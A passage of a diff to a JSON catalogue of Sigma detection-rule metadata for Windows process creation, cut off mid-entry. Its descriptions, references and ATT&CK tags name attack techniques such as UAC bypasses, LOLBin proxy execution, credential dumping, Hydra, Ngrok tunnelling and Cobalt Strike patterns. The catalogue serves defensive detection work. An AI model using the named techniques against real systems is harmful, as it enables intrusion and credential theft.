"proc_creation_win_susp_psexesvc_renamed.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution" + }, + { + "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", + "meta": { + "author": "@neonprimetime, Florian Roth", + "creation_date": "2021/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", + "value": "CVE-2021-40444 Process Pattern" + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/23", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20" + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ] + }, + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution" + }, + { + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certoc_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", + "value": "Suspicious Load DLL via CertOC.exe" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process" + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "value": "Ie4uinit Lolbin Use From Invalid Path" }, { "description": "Detects UAC bypass method using Windows event viewer", @@ -55871,99 +45007,4760 @@ "value": "UAC Bypass via Event Viewer" }, { - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", "meta": { - "author": "Max Altgelt", - "creation_date": "2022/08/23", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", "falsepositive": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "filename": "proc_creation_win_sysnative.yml", + "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" ], "tags": [ - "attack.t1055" + "attack.execution" ] }, - "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "value": "Process Creation Using Sysnative Folder" + "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "value": "Wusa Extracting Cab Files" }, { - "description": "Detects a Windows program executable started from a suspicious folder", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { - "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", - "creation_date": "2017/11/27", + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", "falsepositive": [ - "Exotic software" + "Unknown" ], - "filename": "proc_creation_win_system_exe_anomaly.yml", + "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" + }, + { + "description": "Detects the export of the target Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate export of keys" + ], + "filename": "proc_creation_win_regedit_export_keys.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File" + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE" + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261" + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", - "https://asec.ahnlab.com/en/39828/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ] + }, + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)" + }, + { + "description": "Detects wmiprvse spawning processes", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "value": "Wmiprvse Spawning Process" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "proc_creation_win_new_network_provider.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine" + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt" + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2020/10/05", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + "filename": "proc_creation_win_hack_hydra.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ] + }, + "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra Password Guessing Hack Tool" + }, + { + "description": "Execution of a renamed version of the Plink binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_plink.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ "attack.defense_evasion", "attack.t1036" ] }, - "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "value": "System File Execution Location Anomaly" + "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "value": "Execution Of Renamed Plink Binary" }, { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", + "author": "Christian Burkard", + "creation_date": "2021/08/31", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults" + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641" + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_execution_path.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder" + }, + { + "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "meta": { + "author": "Alexander McDonald", + "creation_date": "2022/06/24", + "falsepositive": [ + "Legitimate use of Msra.exe" + ], + "filename": "proc_creation_win_msra_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", + "value": "Msra.exe Process Injection" + }, + { + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1197" + ] + }, + "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "value": "Monitoring For Persistence Via BITS" + }, + { + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2020/07/30", + "falsepositive": [ + "Legitimate setups that use similar flags" + ], + "filename": "proc_creation_win_apt_winnti_pipemon.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", + "value": "Winnti Pipemon Characteristics" + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/16", + "falsepositive": [ + "NTDS maintenance" + ], + "filename": "proc_creation_win_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rurat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", + "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ] + }, + "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing" + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": "Equation Group DLL_U Load" + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_pchunter.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags" + }, + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage" + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://ngrok.com/docs", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage" + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations" + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Legitimate use by a software developer." + ], + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 